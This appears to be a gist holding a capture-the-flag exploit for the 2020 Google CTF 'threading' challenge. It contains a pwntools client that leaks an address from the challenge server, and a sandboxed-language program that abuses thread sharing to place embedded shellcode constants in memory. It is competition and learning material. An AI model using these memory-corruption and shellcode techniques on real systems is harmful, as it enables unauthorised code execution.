
@y0ny0ns0n
Created August 24, 2020 04:35
from pwn import *
import sys
# context.log_level = "debug"
"""
copied from server.cc
This server builds and runs programs written in the DevMaster Sandboxed Programming Language.
Expected input in the following format:
* execute-binary | 1 byte | If nonzero, built binary is executed. If zero, built binary is instead returned as a response.
* source-size | 4 bytes | The size of the "source" text field, in little-endian bytes.
* source | n bytes | ASCII-encoded source code in the DevMaster Sandboxed Programming Language.
If execute-binary is true and the build succeeds, any additional bytes after this input is streamed to the process during execution.
Output is produced in the following format:
* build-success | 1 byte | Nonzero if the build succeeded, zero if the build failed.
* response-size | 4 bytes | The size of the "response" field, in little-endian bytes.
* response | n bytes | If build-success is 0, the output of the build. If build-success is 1 and execute-binary was nonzero, the built ELF binary. If build-success is nonzero and execute-binary was nonzero, this field is empty.
If build-success and execute-binary are nonzero, any output from program execution is streamed from the process after this output.
"""
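# Client for the challenge server described in the module docstring: it
# submits the contents of ./poc.simp for building, then either saves the
# returned ELF (any command-line argument given) or lets the server run it
# and talks to the resulting process (no argument given).
#
# NOTE(review): in the quoted server.cc text the "response" bullet says
# "execute-binary was nonzero" for both the ELF-returned case and the
# empty case; the "execute-binary" bullet states the ELF is returned when
# the byte is zero, which is the reading this script relies on.
HOST = "threading.2020.ctfcompetition.com"
PORT = 1337

# Request byte 0 ("execute-binary"): 1 = run the built binary, 0 = return it.
execute_binary = len(sys.argv) == 1

# Read as bytes so the request assembles the same way on Python 2 and 3
# (p8/p32 return bytes on Python 3, and "" + bytes raises TypeError there);
# the context manager closes the handle, which the bare open() never did.
# Reading the source before connecting also avoids holding a connection
# open while failing on a missing local file.
with open("poc.simp", "rb") as src:
    simp_code = src.read()

# Request layout: execute-binary (1 byte) | source-size (4 bytes LE) | source.
payload = b"".join([
    p8(1 if execute_binary else 0),
    p32(len(simp_code)),
    simp_code,
])

r = remote(HOST, PORT)
try:
    r.send(payload)

    # Response header: build-success (1 byte) | response-size (4 bytes LE).
    build_success = ord(r.recvn(1))
    log.info("build-success = %d" % build_success)
    if build_success == 0:
        # On a failed build the response field holds the build output; show
        # it rather than discarding it, and exit nonzero so callers notice.
        err_sz = u32(r.recvn(4))
        build_output = r.recvn(err_sz) if err_sz else b""
        log.failure("build failed:\n%s" % build_output.decode("utf-8", "replace"))
        sys.exit(1)

    # if execute-binary is non-zero, response-size is zero
    response_sz = u32(r.recvn(4))
    log.info("response-size = %d" % response_sz)
    if response_sz:
        # execute-binary was zero: the response is the built ELF. Save it for
        # offline inspection; there is no process to talk to in this mode, so
        # the interactive part below would otherwise block on binary data.
        with open("output", "wb") as out:
            out.write(r.recvn(response_sz))
        log.info("built binary written to ./output")
        sys.exit(0)

    context.log_level = "debug"
    # The program's print(arr) line is read up to ">(": the text before the
    # first ">" minus a 4-character prefix is parsed as a hex address.
    # NOTE(review): this assumes the reference renders as a 4-character tag
    # followed by the hex address and ">(" -- confirm against the server's
    # actual output format.
    banner = r.recvuntil(b">(")
    sc_addr = int(banner.split(b">")[0][4:], 16)
    log.info("sc = 0x%x" % sc_addr)
    # poc.simp calls read(8) after print(arr); the delimiter is presumably
    # the tail of that print output. Send the address as 8 LE bytes.
    r.sendafter(b"0, 0, 0])", p64(sc_addr))
    print(r.recvuntil(b"}"))
finally:
    r.close()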
def void t_func(string arg, array<uint64, 1024> aarr1, uint64 val) {
    int32 idx = 0;
    while(idx < 1024) {
        aarr1[idx] = val;
        idx = idx + 1;
    }
    aarr1[0] = 72340172838123592;
    aarr1[1] = 7434932503368958209;
    aarr1[2] = 302101819166187629;
    aarr1[3] = 3595993771285834276;
    aarr1[4] = 18446667387153390070;
    aarr1[5] = 6352444675345383423;
    aarr1[6] = 10416831502663745898;
}
def int32 main() {
    string message = "Hello, World!\n";
    set_max_native_threads(4);
    ref<array<uint64, 1024>> arr = new<array<uint64, 1024>>();
    print(arr);
    uint64 val = bytes64(read(8));
    int32 idx = 0;
    while(idx < 1024) {
        deref(arr)[idx] = val;
        idx = idx + 1;
    }
    deref(arr)[0] = 72340172838123592;
    deref(arr)[1] = 7434932503368958209;
    deref(arr)[2] = 302101819166187629;
    deref(arr)[3] = 3595993771285834276;
    deref(arr)[4] = 18446667387153390070;
    deref(arr)[5] = 6352444675345383423;
    deref(arr)[6] = 10416831502663745898;
    thread t1 = make_thread(t_func, message, deref(arr), val);
    join(t1);
    thread t2 = make_thread(t_func, message, deref(arr), val);
    join(t2);
    thread t3 = make_thread(t_func, message, deref(arr), val);
    join(t3);
    return 0;
}